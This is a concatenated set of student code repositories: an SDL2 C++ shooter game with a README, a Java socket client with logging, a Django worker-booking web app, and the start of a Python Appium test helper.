void render();
int xPos();
int yPos();
int gotHit();
private:
//The X and Y offsets of the FIGHTER
int mPosX, mPosY;
//The velocity of the FIGHTER
int mVelX, mVelY;
//FIGHTER's collision box
SDL_Rect mCollider;
long shootTimer;
int aType;
int hp = 5;
bool right;
};
class BOSS
{
public:
//The dimensions of the FIGHTER
static const int ALIEN_WIDTH = 125;
static const int ALIEN_HEIGHT = 125;
//Maximum axis velocity of the FIGHTER
static const int ALIEN_VEL = 0;
//Initializes the variables
BOSS(int x, int y);
//Moves the FIGHTER and checks collision
void move();
//Shows the FIGHTER on the screen
void render();
int xPos();
int yPos();
int gotHit();
int getHp();
private:
//The X and Y offsets of the FIGHTER
int mPosX, mPosY;
//The velocity of the FIGHTER
int mVelX, mVelY;
//FIGHTER's collision box
SDL_Rect mCollider;
long shootTimer;
bool right = false;
int hp = 40;
long changeTimer;
int pattern;
long menaceTime;
};
//Starts up SDL and creates window
bool init();
//Loads media
bool loadMedia();
//Frees media and shuts down SDL
void close();
//Box collision detector
//void checkCollision( Bullet Bul[] );
//The window we'll be rendering to
SDL_Window* gWindow = NULL;
//The window renderer
SDL_Renderer* gRenderer = NULL;
//Scene textures
LTexture gFIGHTERTexture;
LTexture gALIENTexture;
LTexture gBOSSTexture;
LTexture::LTexture()
{
//Initialize
mTexture = NULL;
mWidth = 0;
mHeight = 0;
}
LTexture::~LTexture()
{
//Deallocate
free();
}
bool LTexture::loadFromFile( std::string path )
{
//Get rid of preexisting texture
free();
//The final texture
SDL_Texture* newTexture = NULL;
//Load image at specified path
SDL_Surface* loadedSurface = SDL_LoadBMP( path.c_str() );
//SDL_Surface* loadedSurface = IMG_Load( path.c_str() );
if( loadedSurface == NULL )
{
printf( "Unable to load image %s! SDL Error: %s\n", path.c_str(), SDL_GetError() );
}
else
{
//Color key image
SDL_SetColorKey( loadedSurface, SDL_TRUE, SDL_MapRGB( loadedSurface->format, 0, 0xFF, 0xFF ) );
//Create texture from surface pixels
newTexture = SDL_CreateTextureFromSurface( gRenderer, loadedSurface );
if( newTexture == NULL )
{
printf( "Unable to create texture from %s! SDL Error: %s\n", path.c_str(), SDL_GetError() );
}
else
{
//Get image dimensions
mWidth = loadedSurface->w;
mHeight = loadedSurface->h;
}
//Get rid of old loaded surface
SDL_FreeSurface( loadedSurface );
}
//Return success
mTexture = newTexture;
return mTexture != NULL;
}
#ifdef _SDL_TTF_H
bool LTexture::loadFromRenderedText( std::string textureText, SDL_Color textColor )
{
//Get rid of preexisting texture
free();
//Render text surface
SDL_Surface* textSurface = TTF_RenderText_Solid( gFont, textureText.c_str(), textColor );
if( textSurface != NULL )
{
//Create texture from surface pixels
mTexture = SDL_CreateTextureFromSurface( gRenderer, textSurface );
if( mTexture == NULL )
{
printf( "Unable to create texture from rendered text! SDL Error: %s\n", SDL_GetError() );
}
else
{
//Get image dimensions
mWidth = textSurface->w;
mHeight = textSurface->h;
}
//Get rid of old surface
SDL_FreeSurface( textSurface );
}
else
{
printf( "Unable to render text surface! SDL_ttf Error: %s\n", TTF_GetError() );
}
//Return success
return mTexture != NULL;
}
#endif
void LTexture::free()
{
//Free texture if it exists
if( mTexture != NULL )
{
SDL_DestroyTexture( mTexture );
mTexture = NULL;
mWidth = 0;
mHeight = 0;
}
}
void LTexture::setColor( Uint8 red, Uint8 green, Uint8 blue )
{
//Modulate texture rgb
SDL_SetTextureColorMod( mTexture, red, green, blue );
}
void LTexture::setBlendMode( SDL_BlendMode blending )
{
//Set blending function
SDL_SetTextureBlendMode( mTexture, blending );
}
void LTexture::setAlpha( Uint8 alpha )
{
//Modulate texture alpha
SDL_SetTextureAlphaMod( mTexture, alpha );
}
void LTexture::render( int x, int y, SDL_Rect* clip, double angle, SDL_Point* center, SDL_RendererFlip flip )
{
//Set rendering space and render to screen
SDL_Rect renderQuad = { x, y, mWidth, mHeight };
//Set clip rendering dimensions
if( clip != NULL )
{
renderQuad.w = clip->w;
renderQuad.h = clip->h;
}
//Render to screen
SDL_RenderCopyEx( gRenderer, mTexture, clip, &renderQuad, angle, center, flip );
}
int LTexture::getWidth()
{
return mWidth;
}
int LTexture::getHeight()
{
return mHeight;
}
FIGHTER::FIGHTER()
{
//Initialize the offsets
mPosX = SCREEN_WIDTH/2;
mPosY = SCREEN_HEIGHT*3/4;
//Set collision box dimension
mCollider.w = gFIGHTERTexture.getWidth();
mCollider.h = gFIGHTERTexture.getHeight();
//Initialize the velocity
mVelX = 0;
mVelY = 0;
shootTimer = SDL_GetTicks();
lastHit = SDL_GetTicks();
}
ALIEN::ALIEN(int x, int y, int type)
{
//Initialize the offsets
mPosX = x;
mPosY = y;
//Set collision box dimension
mCollider.w = gALIENTexture.getWidth();
mCollider.h = gALIENTexture.getHeight();
//Initialize the velocity
mVelX = 1;
mVelY = 0;
shootTimer = SDL_GetTicks();
aType = type;
right = false;
}
BOSS::BOSS(int x, int y)
{
//Initialize the offsets
mPosX = x;
mPosY = y;
//Set collision box dimension
mCollider.w = gBOSSTexture.getWidth();
mCollider.h = gBOSSTexture.getHeight();
//Initialize the velocity
mVelX = 1;
mVelY = 0;
shootTimer = SDL_GetTicks();
changeTimer = SDL_GetTicks();
menaceTime = SDL_GetTicks();
pattern = 0;
}
Bullet::Bullet(int x, int y, int speed, float angle, bool rotate, bool east )
{
dir = angle;
mPosX = x;
mPosY = y;
changeDir = rotate;
ms = speed;
changePat = SDL_GetTicks();
rot = east;
}
Bullet* abul[50];
Bullet* ebul[1000];
void ALIEN::move(int xPos, int yPos)
{
if(right == true)
{
mPosX += mVelX;
if(mPosX > SCREEN_WIDTH-150)
{
mPosX -= mVelX;
right = false;
}
}
else
{
mPosX -= mVelX;
if(mPosX < 50)
{
mPosX += mVelX;
right = true;
}
}
if( shootTimer +1250< SDL_GetTicks() )
{
if(aType == 1)
{
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 90*PI/180, false, false);
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 65*PI/180, false, false);
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 115*PI/180, false , false);
}
else
if(aType == 2)
{
double angle = atan( abs(mPosX+25-xPos+25) /(double)abs(mPosY+25-yPos+25) )*180/PI;
if( yPos+25 > mPosY+ALIEN_HEIGHT/2 )
{
std::cout << angle;
std::cout << "\n";
if( xPos+25 > mPosX+ALIEN_WIDTH/2)
{
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, (angle+270)*PI/180, false, false );
}
else
{
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, (angle+180)*PI/180, false, false);
}
}
else
{
std::cout << angle;
std::cout << "\n";
if( xPos+25 < mPosX+ALIEN_HEIGHT/2 )
{
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, (angle+45)*PI/180, false, false);
}
else
{
ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, (angle)*PI/180, false, false);
}
}
}
shootTimer = SDL_GetTicks();
}
}
void BOSS::move()
{
if( menaceTime + 750 < SDL_GetTicks())
{
if(right == true)
{
mPosX += mVelX;
if(mPosX > SCREEN_WIDTH-300)
{
mPosX -= mVelX;
right = false;
}
}
else
{
mPosX -= mVelX;
if(mPosX < 50)
{
mPosX += mVelX;
right = true;
}
}
if( shootTimer +750< SDL_GetTicks() )
{
if(changeTimer +7500 < SDL_GetTicks() )
{
changeTimer = SDL_GetTicks();
pattern++;
if(pattern == 3)
{
pattern = 0;
}
}
if( pattern == 0 )
{
for(int i = 0; i< 24; i++)
{
ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, (i*15)*PI/180, true, true);
}
}
else
if(pattern == 1)
{
for(int i = 0; i< 24; i++)
{
ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, (i*15)*PI/180, true, false);
}
}
else
{
for(int i = 0; i<4; i++)
{
ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, i*15*PI/180, true, true);
}
for(int i = 0; i< 3; i++)
{
ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, ( 180-(i*15))*PI/180, true, false);
}
ebul[bulletCount2++] = new Bullet((mPosX+225/2)+25, mPosY+225/2, 5, 85, false, false);
ebul[bulletCount2++] = new Bullet((mPosX+225/2)-25, mPosY+225/2, 5, 75, false, false);
}
shootTimer = SDL_GetTicks();
}
}
}
void FIGHTER::handleEvent( SDL_Event& e )
{
//If a key was pressed
if( e.type == SDL_KEYDOWN && e.key.repeat == 0 )
{
//Adjust the velocity
switch( e.key.keysym.sym )
{
case SDLK_UP: mVelY -= FIGHTER_VEL; break;
case SDLK_DOWN: mVelY += FIGHTER_VEL; break;
case SDLK_LEFT: mVelX -= FIGHTER_VEL; break;
case SDLK_RIGHT: mVelX += FIGHTER_VEL; break;
case ' ':
if( SDL_GetTicks() > shootTimer+300 )
{
abul[bulletCount++] = new Bullet(mPosX+FIGHTER_WIDTH/2, mPosY, 5, 270*PI/180, false, false);
shootTimer = SDL_GetTicks();
}
}
}
//If a key was released
else if( e.type == SDL_KEYUP && e.key.repeat == 0 )
{
//Adjust the velocity
switch( e.key.keysym.sym )
{
case SDLK_UP: mVelY += FIGHTER_VEL; break;
case SDLK_DOWN: mVelY -= FIGHTER_VEL; break;
case SDLK_LEFT: mVelX += FIGHTER_VEL; break;
case SDLK_RIGHT: mVelX -= FIGHTER_VEL; break;
case ' ':
if( SDL_GetTicks() > shootTimer+300 )
{
abul[bulletCount++] = new Bullet(mPosX+FIGHTER_WIDTH/2, mPosY, 5, 270*PI/180, false , false);
shootTimer = SDL_GetTicks();
}
}
}
}
void FIGHTER::move()
{
//Move the FIGHTER left or right
mPosX += mVelX;
mCollider.x = mPosX;
//If the FIGHTER collided or went too far to the left or right
if( ( mPosX < 0 ) || ( mPosX + FIGHTER_WIDTH > SCREEN_WIDTH-50 ) )
{
//Move back
mPosX -= mVelX;
mCollider.x = mPosX;
}
//Move the FIGHTER up or down
mPosY += mVelY;
mCollider.y = mPosY;
//If the FIGHTER collided or went too far up or down
if( ( mPosY < 0 ) || ( mPosY + FIGHTER_HEIGHT > SCREEN_HEIGHT ) )
{
//Move back
mPosY -= mVelY;
mCollider.y = mPosY;
}
}
void Bullet::move()
{
mPosX += (int) (ms*cos(dir) );
mPosY += (int) (ms*sin(dir) );
if( changeDir == true && changePat+20 < SDL_GetTicks() && changed < 100)
{
if( rot == false)
{
dir -=(1*PI/180);
}
else
{
dir +=(1*PI/180);
}
changePat = SDL_GetTicks();
changed++;
}
}
void ALIEN::render()
{
gALIENTexture.render(mPosX, mPosY);
}
void BOSS::render()
{
gBOSSTexture.render(mPosX, mPosY);
}
void FIGHTER::render()
{
//Show the FIGHTER
gFIGHTERTexture.render( mPosX, mPosY );
}
int FIGHTER::xPos()
{
return mPosX;
}
int FIGHTER::yPos()
{
return mPosY;
}
int FIGHTER::gotHit()
{
if(lastHit + 250 < SDL_GetTicks() )
{
hp--;
lastHit = SDL_GetTicks();
}
return hp;
}
int FIGHTER::getHp()
{
return hp;
}
int ALIEN::xPos()
{
return mPosX;
}
int ALIEN::yPos()
{
return mPosY;
}
int ALIEN::gotHit()
{
hp--;
return hp;
}
int BOSS::xPos()
{
return mPosX;
}
int BOSS::yPos()
{
return mPosY;
}
int BOSS::gotHit()
{
if( menaceTime + 750 < SDL_GetTicks())
{
hp--;
}
return hp;
}
int BOSS::getHp()
{
return hp;
}
void Bullet::render()
{
filledCircleRGBA(gRenderer, mPosX, mPosY, Bullet_RADIUS, 0xFF,0x0,0x0,0xFF);
}
int Bullet::xPos()
{
return mPosX;
}
int Bullet::yPos()
{
return mPosY;
}
bool init()
{
//Initialization flag
bool success = true;
//Initialize SDL
if( SDL_Init( SDL_INIT_VIDEO ) < 0 )
{
printf( "SDL could not initialize! SDL Error: %s\n", SDL_GetError() );
success = false;
}
else
{
//Set texture filtering to linear
if( !SDL_SetHint( SDL_HINT_RENDER_SCALE_QUALITY, "1" ) )
{
printf( "Warning: Linear texture filtering not enabled!" );
}
//Create window
gWindow = SDL_CreateWindow( "Last Boss", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, SCREEN_WIDTH, SCREEN_HEIGHT, SDL_WINDOW_SHOWN );
if( gWindow == NULL )
{
printf( "Window could not be created! SDL Error: %s\n", SDL_GetError() );
success = false;
}
else
{
//Create vsynced renderer for window
gRenderer = SDL_CreateRenderer( gWindow, -1, SDL_RENDERER_ACCELERATED | SDL_RENDERER_PRESENTVSYNC );
if( gRenderer == NULL )
{
printf( "Renderer could not be created! SDL Error: %s\n", SDL_GetError() );
success = false;
}
else
{
//Initialize renderer color
SDL_SetRenderDrawColor( gRenderer, 0xFF, 0xFF, 0xFF, 0xFF );
}
}
}
return success;
}
bool loadMedia()
{
//Loading success flag
bool success = true;
//Load press texture
if( !gFIGHTERTexture.loadFromFile( "src/MiG-51S.bmp" ) )
{
printf( "Failed to load FIGHTER texture!\n" );
success = false;
}
if( !gALIENTexture.loadFromFile( "src/alien1.bmp" ) )
{
printf( "Failed to load FIGHTER texture!\n" );
success = false;
}
if( !gBOSSTexture.loadFromFile( "src/spacestation.bmp" ) )
{
printf( "Failed to load FIGHTER texture!\n" );
success = false;
}
return success;
}
void close()
{
//Free loaded images
gFIGHTERTexture.free();
gALIENTexture.free();
gBOSSTexture.free();
//Destroy window
SDL_DestroyRenderer( gRenderer );
SDL_DestroyWindow( gWindow );
gWindow = NULL;
gRenderer = NULL;
//Quit SDL subsystems
SDL_Quit();
}
int main( int argc, char* args[] )
{
//Start up SDL and create window
if( !init() )
{
printf( "Failed to initialize!\n" );
}
else
{
//Load media
if( !loadMedia() )
{
printf( "Failed to load media!\n" );
}
else
{
//Main loop flag
bool quit = false;
//Event handler
SDL_Event e;
//The FIGHTER that will be moving around on the screen
FIGHTER fight;
ALIEN* aliens[100];
for(int i = 0; i< 5; i++)
{
aliens[alienCount++] = new ALIEN( SCREEN_WIDTH-150-(100*i), 70*i, 1);
}
int hpLeft = 10;
bool boss = false;
BOSS* station;
//While application is running
while( !quit )
{
//Handle events on queue
while( SDL_PollEvent( &e ) != 0 )
{
//User requests quit
if( e.type == SDL_QUIT )
{
quit = true;
}
//Handle input for the FIGHTER
fight.handleEvent( e );
}
//Move the FIGHTER and check collision
fight.move();
for(int i = 0; i<alienCount; i++)
{
aliens[i]->move(fight.xPos(), fight.yPos());
}
if( boss )
{
station->move();
}
for(int i = 0; i<bulletCount; i++)
{
abul[i]->move();
if(abul[i]->xPos()+Bullet_RADIUS < 0 || abul[i]->xPos() > SCREEN_WIDTH-50 ||
abul[i]->yPos()+Bullet_RADIUS < 0 || abul[i]->yPos() > SCREEN_HEIGHT
)
{
for(int p = i; p<bulletCount-1; p++)
{
abul[p] = abul[p+1];
}
i--;
bulletCount--;
}
else
if( boss == false)
{
for(int k = 0; k<alienCount; k++)
{
if( sqrt( pow( (double) ( (aliens[k]->xPos()+25)-abul[i]->xPos() ), 2.0 ) + pow( (double) ( (aliens[k]->yPos()+25)-abul[i]->yPos() ), 2.0 ) ) < 30)
{
for(int p = i; p<bulletCount-1; p++)
{
abul[p] = abul[p+1];
}
i--;
bulletCount--;
hpLeft = aliens[k]->gotHit();
if(hpLeft == 0)
{
if(alienCount==1)
{
alienCount--;
boss = true;
station = new BOSS( ( ( (SCREEN_WIDTH-50)/2 )-(225/2)), SCREEN_HEIGHT/15 );
break;
}
else
{
for(int o = k; o<alienCount-1;o++)
{
aliens[o] = aliens[o+1];
}
alienCount--;
}
}
break;
}
}
}
else
{
if( sqrt( pow( (double) ( (station->xPos()+100)-abul[i]->xPos() ), 2.0 ) + pow( (double) ( (station->yPos()+100)-abul[i]->yPos() ), 2.0 ) ) < 60)
{
for(int p = i; p<bulletCount-1; p++)
{
abul[p] = abul[p+1];
}
i--;
bulletCount--;
hpLeft = station->gotHit();
if(hpLeft == 0)
{
quit = true;
}
}
}
}
for(int i = 0; i<bulletCount2; i++)
{
ebul[i]->move();
if( sqrt( pow( (double) ( (fight.xPos()+25)-ebul[i]->xPos() ), 2.0 ) + pow( (double) ( (fight.yPos()+25)-ebul[i]->yPos() ), 2.0 ) ) < 30)
{
for(int p = i; p<bulletCount2-1; p++)
{
ebul[p] = ebul[p+1];
}
i--;
bulletCount2--;
hpLeft = fight.gotHit();
if(hpLeft == 0)
{
quit = true;
}
}
else
if(ebul[i]->xPos()+Bullet_RADIUS < 0 || ebul[i]->xPos() > SCREEN_WIDTH-50 ||
ebul[i]->yPos()+Bullet_RADIUS < 0 || ebul[i]->yPos() > SCREEN_HEIGHT
)
{
for(int p = i; p<bulletCount2-1; p++)
{
ebul[p] = ebul[p+1];
}
i--;
bulletCount2--;
}
}
//Clear screen
SDL_SetRenderDrawColor( gRenderer, 0xFF, 0xFF, 0xFF, 0xFF );
SDL_RenderClear( gRenderer );
//Render wall
SDL_SetRenderDrawColor( gRenderer, 0x00, 0x00, 0x00, 0xFF );
//Render FIGHTER
boxRGBA(gRenderer, 0, 0, SCREEN_WIDTH-50, SCREEN_HEIGHT, 0x0,0x0,0x0,0xFF);
boxRGBA(gRenderer, SCREEN_WIDTH-40, SCREEN_HEIGHT-(20*fight.getHp()), SCREEN_WIDTH-25, SCREEN_HEIGHT, 0x0,0x0,0xFF,0xFF);
fight.render();
if(boss)
{
boxRGBA(gRenderer, SCREEN_WIDTH-40, 0, SCREEN_WIDTH-25, 0+(station->getHp()*10), 0xFF,0x0,0x0,0xFF);
station->render();
}
for(int i = 0; i<alienCount;i++)
{
aliens[i]->render();
}
for(int i = 0; i<bulletCount; i++)
{
abul[i]->render();
}
for(int i = 0; i<bulletCount2; i++)
{
ebul[i]->render();
}
//Update screen
SDL_RenderPresent( gRenderer );
}
}
}
//Free resources and close SDL
close();
return 0;
}
<file_sep>/README.md
#Finals (deadline: 2015-03-XX)
Submit your finals here. Here are a couple of reminders:
1. Do not commit compiler or IDE-generated files (the *.o, *.pdb among others)
2. Documentation, especially on how to build and play the game, is appreciated.
3. Also commit a PDF version of the [Certificate of Authorship for groups](http://www.admu.edu.ph/ls/sose/iscs/downloads).
to build the game you'll need to get SDL2 and SDL_gfx running for your project here is one way to do it:
Using eclipse kepler on mac OSX
1.) Download SDL framework from http://www.libsdl.org/download-2.0.php then copy paste the SDL framework in your Library/Frameworks
2.) make a new C++ project with executable Hello World C++ Project and name it main.cpp
3.) right click your project then click properties->c/c++ Build->Settings->Tool Settings tab->Miscellaneous and this to the linker flags "-framework SDL2 -framework Cocoa" without the quotes
4.) Download SDL2_gfx from http://cms.ferzkopp.net/index.php/software/13-sdl-gfx
5.) unzip your SDL2_gfx and add these files to where your project directory is
SDL2_gfxPrimitives.h
SDL2_gfxPrimitives.c
SDL2_gfxPrimitives_font.h
SDL2_rotozoom.c
SDL2_rotozoom.h
6.) change SDL2_gfxPrimitives.h and SDL2_rotozoom.h's line where it says #include "SDL.h" to
#include "SDL2/SDL.h"
7.) Build and run it
This game has 3 classes, FIGHTER, ALIEN, BOSS
all 3 have a method called move() that lets them move around and shoot bullets based on their shootTimer but only the fighter is controlled by the player. The FIGHTER has a handleEvent() method to know how it should move around and to fire its bullets towards the enemy
all 3 have hp and a method gotHit so that they lose 1 hp if the code detected that a bullet touched them.
all 3 have render() so that they can load the respective bmp file as their avatar
using boxRGBA of the SDL_gfx and the getHp() method of the boss and fighter I show their respective health on the right most part of the game
| 48fe3cdcf216a64fa2ebab3d688f005684e32409 | [
"Markdown",
"C++"
] | 2 | C++ | NegiXNodoka/final | 192f55ff1f823fabbf07113f2a0c621409929d92 | 11603fc5d3271590bf2bb65def7da4e02921f340 |
refs/heads/master | <repo_name>clotildeguinard/MyCloudDB<file_sep>/src/test/TestLogging.java
package test;
import tools.Loggable;
import org.apache.log4j.Level;
public class TestLogging extends Loggable {
/**
* @return Shows how the logger works;
*/
private void testLogger() {
logger.removeAppender("file");
logger.warn("This is warn");
logger.error("This is error");
logger.fatal("This is fatal");
}
public static void main(String[] args) {
TestLogging obj = new TestLogging();
obj.testLogger();
}
}
<file_sep>/README.md
MyCloudDB
=========
Project for the lab "Cloud data bases"
<file_sep>/src/ui/ClientLogic.java
package ui;
import java.io.*;
import java.net.*;
import tools.Loggable;
/**
*
* @author nadiastraton
*/
public class ClientLogic extends Loggable {
public static Socket socket;
/**
*
* @param ipAddress
* @param port
* @return ClientSocket after connecting to the server or null if failed
*/
public static Socket connect(String ipAddress, int port) {
logger.debug("Connection attempt...");
try {
socket = new Socket(ipAddress, port);
logger.info("Connection successful with parameters " + ipAddress + " and " + port);
} catch (Exception e) {
logger.error("Failed to connect with parameters " + ipAddress + " and " + port + " : " + e);
}
return socket;
}
/**
*
* @param sock
* @return True if socket null or successfully closed, false otherwise.
*/
public static boolean disconnect(Socket sock)
{
logger.debug("Disconnection attempt...");
if (sock != null) {
try {
sock.close();
} catch (IOException ioex) {
logger.error("Failed to disconnect : " + ioex);
return false;
}
}
logger.info("Successfully disconnected");
return true;
}
/**
* Send non-null byte array through the socket
* @param myByteArray
* @throws IOException
*/
public static boolean send(byte[] myByteArray) {
logger.info("Sending an array of bytes, length : " + myByteArray.length);
int start = 0;
int len = myByteArray.length;
try {
OutputStream out = socket.getOutputStream();
DataOutputStream dos = new DataOutputStream(out);
dos.writeInt(len);
if (len > 0) {
dos.write(myByteArray, start, len);
}
return true;
} catch (IOException ioex) {
logger.error("Failed to send array of bytes, length " + myByteArray.length + " : " + ioex);
return false;
}
}
/**
*
* @return A message from the server
*/
public static byte[] receive() {
logger.info("Receiving answer...");
try {
byte[] b = new byte[16384];
ByteArrayOutputStream buffer = new ByteArrayOutputStream();
InputStream in = socket.getInputStream();
DataInputStream dis = new DataInputStream(in);
while (in.read(b) != -1) {
buffer.write(b);
}
buffer.flush();
logger.debug("Received answer");
return buffer.toByteArray();
} catch (IOException e) {
logger.error("Failed to receive array of bytes : " + e);
return null;
}
}
public static void help(){
logger.debug("Providing help.");
System.out
.println("\nFollowing set of commands provide following functionalities:"
+ "\nconnect <ipAddress> <portNumber>: establishes connection to the echo server "
+ "\ndisconnect: disconnects from the server and receives confirmation message "
+ "\nsend <message>: sends the message to the server "
+ "\nlogLevel: prints out current log level"
+ "\nlogLevel <logLevel>: changes log level to one of the following : ALL, DEBUG, INFO, WARN, ERROR, FATAL, OFF"
+ "\nquit: tears down the active connection and shut down the system ");
}
/**
*
* @return True if no socket remains connected, false if the connected socket fails to close.
*/
public static boolean quit(){
logger.info("Attempt to quit; asking to disconnect...");
return disconnect(socket);
}
public static boolean unknownCommand(String any)
{
logger.warn("Unknown command: " + any);
return false;
}
} | e472fac6f9ecf216aa5e9d22ef04ba86e8c6426b | [
"Markdown",
"Java"
] | 3 | Java | clotildeguinard/MyCloudDB | 834b55a918990cd4874529f4b82ea45d04f0723c | df313d6148b81a6d319f1816c0a665d7736bd3e8 |
refs/heads/master | <repo_name>Avinash9565/my-first-blog<file_sep>/web1/demo/migrations/0002_order_p_order.py
# Generated by Django 3.0.4 on 2020-12-04 06:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('demo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.CharField(max_length=25)),
('work', models.CharField(max_length=25)),
('worker', models.CharField(max_length=25)),
('date', models.DateField()),
('slot', models.CharField(max_length=25)),
],
),
migrations.CreateModel(
name='p_order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.CharField(max_length=25)),
('work', models.CharField(max_length=25)),
('worker', models.CharField(max_length=25)),
('date', models.DateField()),
('slot', models.CharField(max_length=25)),
('part', models.CharField(max_length=25)),
],
),
]
<file_sep>/web1/demo/models.py
from django.db import models
# Create your models here.
class Customer(models.Model):
Name = models.CharField( max_length=50)
Mail = models.EmailField( max_length=254)
Phnno = models.BigIntegerField()
worker = models.BooleanField()
work = models.CharField( max_length=50)
user_ID = models.CharField(max_length=20,primary_key=True)
password = models.CharField( max_length=50)
def __str__(self):
return self.Name
class order(models.Model):
user = models.CharField( max_length=25)
work = models.CharField( max_length=25)
worker = models.CharField( max_length=25)
date = models.DateField()
slot = models.CharField( max_length=25)
class p_order(models.Model):
user = models.CharField( max_length=25)
work = models.CharField( max_length=25)
worker = models.CharField( max_length=25)
date = models.DateField()
slot = models.CharField( max_length=25)
part = models.CharField( max_length=25)
"""class Meta:
verbose_name = _("")
verbose_name_plural = _("s")
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("_detail", kwargs={"pk": self.pk})"""
<file_sep>/web1/demo/views.py
from django.contrib.auth.models import User
from django.contrib.auth import authenticate,login,logout
from django.shortcuts import render,redirect
from django.contrib import messages
from .forms import RegisterForm
from .models import Customer,order,p_order
# Create your views here.
def index(request):
return render(request,"home.html")
def about(request):
return render(request,"about.html")
def logout_view(request):
logout(request)
return render(request,"home.html")
def use(request):
form = RegisterForm()
if request.method =='POST':
form = RegisterForm(request.POST)
un=request.POST['Name']
em=request.POST['Mail']
pn=request.POST['Phnno']
wk=request.POST.get('worker',False)
wrk=request.POST['work']
uid=request.POST['user_ID']
pw=request.POST['password']
print(wk)
if Customer.objects.filter(user_ID=uid).exists():
messages.info(request,"user id already taken")
return redirect('/user')
elif len(pw)<=6:
messages.info(request,"password must be greater than 6")
return redirect('/user')
elif len(pn)!=10 and len(pn)!=11:
messages.info(request,"please enter valid phone number")
return redirect('/user')
elif len(em)<=7 and "@" not in em and em[-4:0:-1]!=".com":
messages.info(request,"enter valid email")
return redirect('/user')
else:
if form.is_valid():
form.save()
u=User.objects.create_user(uid,em,pw)
u.save()
return render(request,"home.html")
context = {'form':form}
return render(request,"user.html",context)
def wor(request):
if request.method =='POST':
print("after login")
uid=request.POST['user_ID']
ps=request.POST['password']
user = authenticate(username=uid,password=ps)
"""rq=Customer.objects.all()
for zx in rq:
if zx.user_ID==uid and zx.password==ps:
cuid=uid
return render(request,"aflogin.html")"""
if user is not None:
login(request,user)
return redirect('/login')
else:
messages.info(request,"enter valid details")
return render(request,"work.html")
#return render(request,"aflogin.html")
else:
return render(request,"work.html")
def aflogin(request):
print(request.user)
return render(request,"aflogin.html")
def detail(request):
query_result=Customer.objects.filter(worker=True)
print(request.user)
context={'query_result':query_result}
return render(request,"detail.html",context)
def book(request):
if request.method=="POST":
uid=request.POST['user_ID']
wk=request.POST['work']
dt=request.POST['date']
t=request.POST['time']
ob=p_order()
ob.user=request.user
ob.work=wk
ob.worker=uid
ob.date=dt
ob.slot=t
ob.part="sample"
ob.save()
za=0
zx=Customer.objects.all()
for ot in zx:
if ot.user_ID==uid:
za+=1
print(zx)
if za!=0:
zs=0
q=order.objects.all()
for ot in q:
#print(ot.work,ot.worker,ot.date,ot.slot)
#print(wk,uid,dt,t)
#print(len(str(dt)),len(str(ot.date)))
if ot.work==wk and ot.worker==uid and str(ot.date)==str(dt) and ot.slot==t:
print("avinash")
zs=1
if zs==1:
messages.info(request,"please try another slot.this slot is already booked")
print(p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t))
p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t).delete()
return render(request,"book.html")
else:
q=p_order.objects.all()
zx=0
print(p_order.objects.all().filter(user=request.user,worker=uid,work=wk,date=dt,slot=t))
for ot in q:
if ot.user!=request.user and ot.work==wk and ot.worker==uid and ot.date==dt and ot.slot==t:
zx+=1
if zx==0:
ob.delete()
print(q)
messages.info(request,"your slot is booked")
sl=order(worker=uid,work=wk,user=request.user,date=dt,slot=t)
sl.save()
return render(request,"book.html")
else:
ob.delete()
messages.info(request,"please try after few seconds")
return render(request,"book.html")
else:
ob.delete()
messages.info(request,"please enter a valid user-ID")
return render(request,"book.html")
else:
return render(request,"book.html")<file_sep>/web1/demo/migrations/0001_initial.py
# Generated by Django 3.0.4 on 2020-12-03 09:18
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('Name', models.CharField(max_length=50)),
('Mail', models.EmailField(max_length=254)),
('Phnno', models.BigIntegerField()),
('worker', models.BooleanField()),
('work', models.CharField(max_length=50)),
('user_ID', models.CharField(max_length=20, primary_key=True, serialize=False)),
('password', models.CharField(max_length=50)),
],
),
]
| 85874e65381db1415112e6abca90430cd00f4f6a | [
"Python"
] | 4 | Python | Avinash9565/my-first-blog | 7230f4ac216dc375588af7d19d0340c1ffc0e9c5 | 7cf595aaa1a894970ffa645ae80ea9a99b440bc2 |
refs/heads/master | <repo_name>cwx727/Appium-Python-<file_sep>/handle/login_handle.py
import sys
sys.path.append("..")
from page.login_page import LoginPage
class LoginHandle:
def __init__(self,i):
self.login_page = LoginPage(i)
def send_username(self,username):
return self.login_page.get_username_element().send_keys(username)
def send_password(self,password):
return self.login_page.get_password_element().send_keys(password)
def click_login(self):
return self.login_page.get_login_button_element().click()
def click_forget_password(self):
return self.login_page.get_forget_password_element().click()
def click_register(self):
return self.login_page.get_register_element().click()
def get_fail_toast(self,message):
toast_element = self.login_page.get_toast_element(message)
if toast_element:
return True
else:
return False
<file_sep>/base/base_driver.py
import time
from appium import webdriver
import sys
sys.path.append("..")
from util.write_user_command import WriteUserCommand
class BaseDriver:
def android_driver(self,i):
'''
